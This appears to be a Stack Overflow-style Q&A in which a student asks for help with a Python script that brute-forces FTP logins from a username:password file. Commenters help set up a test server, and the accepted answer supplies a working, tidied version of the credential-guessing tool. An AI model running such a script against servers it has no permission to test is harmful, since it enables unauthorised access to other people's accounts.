# Python FTP brute forcing

Tags: python, ftp, brute-force

I am working on a school coding project that will use a python script to brute force an FTP server using a text document. This is what I have:

```
from ftplib import FTP
from optparse import OptionParser

def brute(host, username, password):
    try:
        ftp = FTP(host)
        ftp.login(username, password)
        ftp.retrlines('LIST')
        print ('Ftp server connected using the provided username "' + username + '" and     password "' + password + '"')
        ftp.quit()
    except:
        print ('Could not connect to the ftp server using the provided username "' + username + '" and password "' + password + '"')

def main():
    parser = OptionParser(usage="usage: python3 <program name>.py -H <target IP -P <password file>")
    parser.add_option("-H", type="string",
                      help="Enter target host IP",
                      dest="targetHost")
    parser.add_option("-P", type="string",
                      help="Enter password file",
                      dest="passFile")
    (options, args) = parser.parse_args()

    with open(options.passFile) as f:
        content = f.readlines()
        content = [x.split(':') for x in content]
        username = []
        password = []
        i = 0
        for x in range(len(content)):
            username.append(content[i][0])
            password.append(content[i][1])
            i += 1
        password = [x.replace('\n', '') for x in password]
        f.close()

    for x in range(len(username)):
        brute(options.targetHost, username[x], password[x])

main()
```

The text document comes in a format like **username:password**. 
To test it, I have to setup an FTP server, which I did.
After I setup the FTP server and ran the script it worked, but it did not actually connect me to the FTP server, rather it gave me my except print. I've been trying to configure my FTP server for a while now, trying to get it to work, but its the same result. So I want to know if my script is the problem or if I just didn't configure my FTP server correctly. If it is my script that is the problem, could somebody point out what it is, otherwise if my script is fine, then would somebody be willing to link to a site that shows how to setup and configure an FTP server for Windows 2008 or Linux?
Thanks in advance.

Comment: With `except` you can get error message - it gives you more information. Or remove `try/except` to get this error message.

Comment: Have you try to connect to your FTP server with standard tools like `ftp` command on Linux (maybe on Windows too)

Comment: @furas I removed the try/except part and did get an error message that said "TimeoutError: [WinError 10060] A connnection attempt failed because the connected party did not properly respond after a period of tim, or established connection failed because connected host has failed to respond". So I guess the problem is my FTP server?

Comment: Use other tool (like command `ftp`) to connect to server to comfirm problem with server. Using that tool will be easer to test server after config modification. It can gives you more information about problem.

Comment: Okay, I tried using the ftp command in Ubuntu to connect to my FTP server. It gave me a "ftp: connect: Connection timed out", I checked to make sure port 21 was open on my FTP server. So I guess that my FTP server is the problem of all this?

Comment: It can be server or firewall. Once I installed FTP on Linux Mint (base on Ubuntu). I tried different FTP servers - proftpd, pure-ftpd, vsftpd. I don't remeber which one was the easest to run - probably proftpd.

Comment: Most of the guides that I have been following just use vsfpd, I might try the other ones to be sure. Thanks a lot for your help.

Comment: For test I installed `proftpd` on my linux (`sudo apt-get install proftpd`) and it works at once. Even I didn't have to change configuration.

Comment: Sweet, I got it to work when I installed proftpd onto Ubuntu. Thanks a lot @furas.

Comment: I'm testing your code now.

Answer (score 2, accepted):

```
#!/usr/bin/env python3

from ftplib import FTP
from optparse import OptionParser

def brute(host, username, password):
    try:
        ftp = FTP(host)
        ftp.login(username, password)
        ftp.retrlines('LIST')
        print ('Ftp server connected using the provided username "' + username + '" and     password "' + password + '"')
        ftp.quit()
    except:
        print ('Could not connect to the ftp server using the provided username "' + username + '" and password "' + password + '"')

def main():
    parser = OptionParser(usage="usage: python3 <program name>.py -t <target IP> -p <password file>")
    parser.add_option("-t", type="string",
                      help="Enter target host IP",
                      dest="targetHost")
    parser.add_option("-p", type="string",
                      help="Enter password file",
                      dest="passFile")
    (options, args) = parser.parse_args()

    if not options.passFile or not options.targetHost:
        parser.print_help()
    else:
        with open(options.passFile) as f:
            data = [ line.strip().split(':') for line in f ]

        for username, password in data:
            brute(options.targetHost, username, password)

main()
```

--

With line `#!/usr/bin/env python3` (called `hashbang` - `#` = `hash`, `!` = `bang`)
I can run script directly

```
bash$ my_script.py
```

or

```
bash$ ./my_script.py
```

(but first I have to set it executable `chmod +x my_script.py`)

I can even remove `.py` and it will work

```
bash$ my_script
```

or

```
bash$ ./my_script
```

--

Most programs use lowercase arguments and I prefer it so I use `-t` and `-p`

--

OptionParser didn't check whether arguments were used.

--

Last part of code can be also

```
    with open(options.passFile) as f:
        for line in f:
            username, password = line.strip().split(':')
            brute(options.targetHost, username, password)
```

Comment: Thanks a lot, that last part of the code took me hours to come up with, mostly because I kept getting errors.